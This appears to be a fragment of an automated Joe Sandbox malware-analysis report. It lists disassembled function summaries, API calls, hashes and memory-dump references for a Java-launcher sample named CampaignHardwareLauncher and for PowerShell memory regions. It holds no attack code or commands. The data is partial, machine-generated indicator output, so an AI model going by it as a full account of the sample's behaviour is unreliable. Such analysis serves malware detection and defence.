                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: KillMessagePostQuitTimer$CodeEnumExitProcessShowWindowWindows
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1905518172-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: ed7f04139cc10e99910bf818abc7fe4566fa36b293454e2dcc1566a67e520c2f
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4aa06db3ae75fa459c5dc857b340d842a3fba66811b007700aa9ab28a47e10bc
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed7f04139cc10e99910bf818abc7fe4566fa36b293454e2dcc1566a67e520c2f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75216F71B053048BC714EF39EA4571A77E1AB80348F00853EE885A73A0D739E915DB9B
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$ErrorFindLastLoadLockfprintf
                                                                                                                                                                                                                                                                                                                • String ID: Resource %d:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 2300709556-3770364717
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Heap %s:Requested %d MB / %d%%, Available: %d MB, Heap size: %d MB, xrefs: 00403688
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strlen$_itoafprintfstrcat
                                                                                                                                                                                                                                                                                                                • String ID: Heap %s:Requested %d MB / %d%%, Available: %d MB, Heap size: %d MB
                                                                                                                                                                                                                                                                                                                • API String ID: 309510014-1709647519
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: fopenmemsetstrlenstrncpy
                                                                                                                                                                                                                                                                                                                • String ID: j.lo$nch4
                                                                                                                                                                                                                                                                                                                • API String ID: 80595551-1605737849
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: signal
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1946981877-0
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: EnvironmentVariablestrlen$memsetstrcat
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2108680700-0
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
Similarity
• API ID: strcatstrlen
• String ID: bin\java.exe$bin\javaw.exe
• API String ID: 1179760717-2770878578
• Opcode ID: b65ea48d9e9f20d7926c5458ddd7f93f7f40326ce165c218aab041ff87f19a90
• Instruction ID: 7687c5f18350c46cbce8d6c5260ce5ab4989a23d013a9ddc911cfd2f41cc631c
• Opcode Fuzzy Hash: b65ea48d9e9f20d7926c5458ddd7f93f7f40326ce165c218aab041ff87f19a90
• Instruction Fuzzy Hash: 01F062B4D183049EE710AF39D9C9A1ABBD4AF00308F46487EE4895F3D3D77A8450879A
APIs
• SetEnvironmentVariableA.KERNEL32 ref: 004052EC
• strtok.MSVCRT(?,?,?,?,00406514), ref: 004052FF
• strchr.MSVCRT ref: 00405316
  • Part of subcall function 00403100: memset.MSVCRT ref: 00403136
  • Part of subcall function 00403100: memset.MSVCRT ref: 00403151
  • Part of subcall function 00403100: strchr.MSVCRT ref: 0040316C
  • Part of subcall function 00403100: strchr.MSVCRT ref: 0040318A
  • Part of subcall function 00403100: strncat.MSVCRT ref: 004031AF
  • Part of subcall function 00403100: strncat.MSVCRT ref: 004031D5
  • Part of subcall function 00403100: strlen.MSVCRT ref: 004031EB
  • Part of subcall function 00403100: strstr.MSVCRT ref: 0040327E
• fprintf.MSVCRT ref: 0040535A
• SetLastError.KERNEL32(?,?,?,00406514), ref: 00405373
Strings
Memory Dump Source
• Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
Similarity
• API ID: strchr$memsetstrncat$EnvironmentErrorLastVariablefprintfstrlenstrstrstrtok
• String ID: Set var:%s = %s
• API String ID: 3263537496-1184643595
• Opcode ID: ee98d8c8936dcdd218bc3ae6b4bee14f3b7f662cf54e9fc7437ca12448ec09f5
• Instruction ID: b35ccef8a7e5673246ed472a237be416f5c44ba05b5604b2d57a73e62d97e0d5
• Opcode Fuzzy Hash: ee98d8c8936dcdd218bc3ae6b4bee14f3b7f662cf54e9fc7437ca12448ec09f5
• Instruction Fuzzy Hash: FA01DAB05087109EC701AF2AC58031EBFE4AF88744F41C87FE4C8AB381D77889519F9A
APIs
• FormatMessageA.KERNEL32(?,?,?,?,?,?,?,?,004013DA), ref: 00401FFD
• strlen.MSVCRT ref: 0040201F
• strcat.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004013DA), ref: 00402040
• LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004013DA), ref: 0040204B
• fprintf.MSVCRT ref: 004020A9
Strings
Memory Dump Source
• Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
Similarity
• API ID: FormatFreeLocalMessagefprintfstrcatstrlen
• String ID: An error occurred while starting the application.
• API String ID: 863393273-2110520379
• Opcode ID: 9e24085052815f66a929547d79b0b0ecebc814cf3094997c733abd0dc5bb07b1
• Instruction ID: 48929c70c90143ab4f29c9b601d13be01fb97ec1997cc056402bd9998a5ef999
• Opcode Fuzzy Hash: 9e24085052815f66a929547d79b0b0ecebc814cf3094997c733abd0dc5bb07b1
• Instruction Fuzzy Hash: 730116B0A083018BC300EF69C28025BBBF1BB84314F01886EE8C9A7245D77896548B8A
APIs
• memset.MSVCRT ref: 004012F4
  • Part of subcall function 004020C0: FindResourceExA.KERNEL32(?,?,?,00401888), ref: 004020EF
  • Part of subcall function 004020C0: LoadResource.KERNEL32 ref: 00402108
  • Part of subcall function 004020C0: LockResource.KERNEL32 ref: 00402117
• FindWindowExA.USER32 ref: 0040132A
• GetWindowTextA.USER32 ref: 00401350
• strstr.MSVCRT ref: 0040135F
• FindWindowExA.USER32 ref: 0040137F
Memory Dump Source
• Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
Similarity
• API ID: FindResourceWindow$LoadLockTextmemsetstrstr
• String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1871962372-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 1298e7c1909e02cac85a35fd553868d9f91c7302c22f4e1a6b2c68c72ce7dee5
                                                                                                                                                                                                                                                                                                                • Instruction ID: 5d52d5c0b459d14cb6f1974f7d56ade6fd7020e608e51b2663064d8790cfeea0
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1298e7c1909e02cac85a35fd553868d9f91c7302c22f4e1a6b2c68c72ce7dee5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 282160B2A083019BE714AF6AD54129FFBE4EF84354F01C83FE98CD3691E67885548B86
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Runtime used:%s (%s-bit), xrefs: 00402FC4
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657, xrefs: 00402F90
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: fprintfstrcpy
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$Runtime used:%s (%s-bit)
                                                                                                                                                                                                                                                                                                                • API String ID: 1458319006-3954875208
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5561c27fd72a1e767c22225ba6b48e1c42a17190cfea799da6d8e7f1897e806e
                                                                                                                                                                                                                                                                                                                • Instruction ID: e570360796af71997f007bbec0ddf7bd71377d3d7eeb5d391251dbc393d587ea
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5561c27fd72a1e767c22225ba6b48e1c42a17190cfea799da6d8e7f1897e806e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA3139719093019BD715AF24864839FB6A1EB80748F01C87FE8887B3C6D7BD9C419B8A
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Runtime used:%s (%s-bit), xrefs: 00402FC4
                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657, xrefs: 00402F90
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: fprintfstrcpy
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657$Runtime used:%s (%s-bit)
                                                                                                                                                                                                                                                                                                                • API String ID: 1458319006-3954875208
                                                                                                                                                                                                                                                                                                                • Opcode ID: e34a0cca9953dcd10a531016e5b932c1cff74b83191ca0bd0e7937265830d13f
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2e410cda6b073cc25c187766190d21a1da9afde98849d5476af63c368e3af956
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e34a0cca9953dcd10a531016e5b932c1cff74b83191ca0bd0e7937265830d13f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 602181719043059BD7149F15C64439BB7A5EB80348F01C87EE8887B3C6C7BD9C519B89
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 00403717
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: FindResourceExA.KERNEL32 ref: 00403440
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: LoadResource.KERNEL32 ref: 0040345C
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: LockResource.KERNEL32 ref: 0040346B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: fprintf.MSVCRT ref: 004034B3
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: atoi.MSVCRT ref: 004034C3
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: FindResourceExA.KERNEL32 ref: 004034FE
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: LoadResource.KERNEL32 ref: 0040351B
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: LockResource.KERNEL32 ref: 0040352A
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: fprintf.MSVCRT ref: 00403573
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: atoi.MSVCRT ref: 00403583
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: strcat.MSVCRT(?), ref: 0040361A
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: strlen.MSVCRT ref: 00403622
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: _itoa.MSVCRT ref: 00403639
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033F0: strlen.MSVCRT ref: 00403641
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLockatoifprintfstrlen$GlobalMemoryStatus_itoastrcat
                                                                                                                                                                                                                                                                                                                • String ID: -Xms$-Xmx$@
                                                                                                                                                                                                                                                                                                                • API String ID: 2157757142-2676391021
                                                                                                                                                                                                                                                                                                                • Opcode ID: dff8b46c210c447c65d657b453adb865e188cc97235aba00eb8c1e73047c40b0
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0838842f76f9e4a7ac68c74f3cf3971a36c87926e8153908363a189b489a0147
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dff8b46c210c447c65d657b453adb865e188cc97235aba00eb8c1e73047c40b0
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D01D7B09097099FC704DF69E18154EBBF1EF88304F10883EF489A7385D738D9449B46
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CodeEnumExitKillMessagePostProcessQuitTimerWindows
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 405088690-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9d36f53bfc2b48dcf375a5f439baa85ef358b269035d827499970f5c7433ee0c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4530f2aae7447fe0df29e6f37fc7dc1219e95ab942fdeb78a325eac38ac8bd41
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d36f53bfc2b48dcf375a5f439baa85ef358b269035d827499970f5c7433ee0c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87F05EB59093008BC300BF34DA052197AE0AB40348F018A3FE8C5A33D1D77C9558EB9B
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                                                                                • String ID: Laun$ch4j
                                                                                                                                                                                                                                                                                                                • API String ID: 4139908857-52159806
                                                                                                                                                                                                                                                                                                                • Opcode ID: ba5704b0daeddb5bd746fd9b5eed543a5f99ab6f6a48090e1268a62a4232c58d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3efb9f204aa9b6cf598ae448a7fd9fa3256bf58a8a3bede9923b47c04f3ea8c0
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba5704b0daeddb5bd746fd9b5eed543a5f99ab6f6a48090e1268a62a4232c58d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30F01CB0A042058BD708EF3EEE053963AE2A784300F04C27ED409CB3B5EBB484618B8D
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strlen$strchrstrncpy
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4793283-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: c717c3167b26713e1d36be612c62a11c9a96452fabd6d96aff045e23f77e9a9b
                                                                                                                                                                                                                                                                                                                • Instruction ID: 1041cfa0432d9ad742072a7b848d71ebc1d8de872eff087a6a568f2cbe167894
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c717c3167b26713e1d36be612c62a11c9a96452fabd6d96aff045e23f77e9a9b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E11D3B8D04728ABCB009F55C5841AEFBB1EF48310F1684AAE8547B381C779AA41CBC6

                                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                                Execution Coverage:7.6%
                                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                                                                execution_graph 16499 8b36838 16500 8b3687b SetThreadToken 16499->16500 16501 8b368a9 16500->16501
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: 282f69e64622e495d6c39ef7d74328ddd0da0295ce6836400b6933d38f778901
                                                                                                                                                                                                                                                                                                                • Instruction ID: a41784c9677d1955736eff2f084b2e50ae368d35d9d2823ec33d503b6e987463
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 282f69e64622e495d6c39ef7d74328ddd0da0295ce6836400b6933d38f778901
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14912070A006155FEB19DFB488115AEB7F2EFC4604B00C92DD55AAB384EF34AD06CBD6
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2239303092.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                • Opcode ID: b9cf2eee2df2f58ad65b807f32c90fbdfa6f862ee1f701908f2520e8901573b8
                                                                                                                                                                                                                                                                                                                • Instruction ID: 791fa7d8f2a46ced273f0b431068d41faea162d08d1d20f9a8ad04365e11f601
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9cf2eee2df2f58ad65b807f32c90fbdfa6f862ee1f701908f2520e8901573b8
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52913F70A006155FEB19EFB488115AEB6F2EFC4604B40C92DD55AAB384EF34BD06CBD6
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
